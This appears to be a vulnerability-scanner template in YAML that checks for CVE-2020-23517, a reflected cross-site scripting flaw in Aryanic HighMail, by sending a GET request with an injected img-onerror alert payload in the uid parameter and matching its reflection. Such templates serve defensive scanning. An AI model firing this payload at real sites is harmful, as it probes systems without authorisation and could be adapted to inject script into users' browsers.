34 lines
1019 B
YAML
34 lines
1019 B
YAML
id: CVE-2020-23517
|
|
|
|
info:
|
|
name: Aryanic HighMail (High CMS) Cross-Site Scripting
|
|
author: geeknik
|
|
severity: medium
|
|
description: "A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm."
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-23517
|
|
- https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
|
|
tags: xss,cve,cve2020
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.10
|
|
cve-id: CVE-2020-23517
|
|
cwe-id: CWE-79
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- text/html
|
|
part: header
|
|
- type: word
|
|
words:
|
|
- "<img src=\"x\" onerror=\"alert('XSS')"
|
|
|
|
# Enhanced by mp on 2022/03/14
|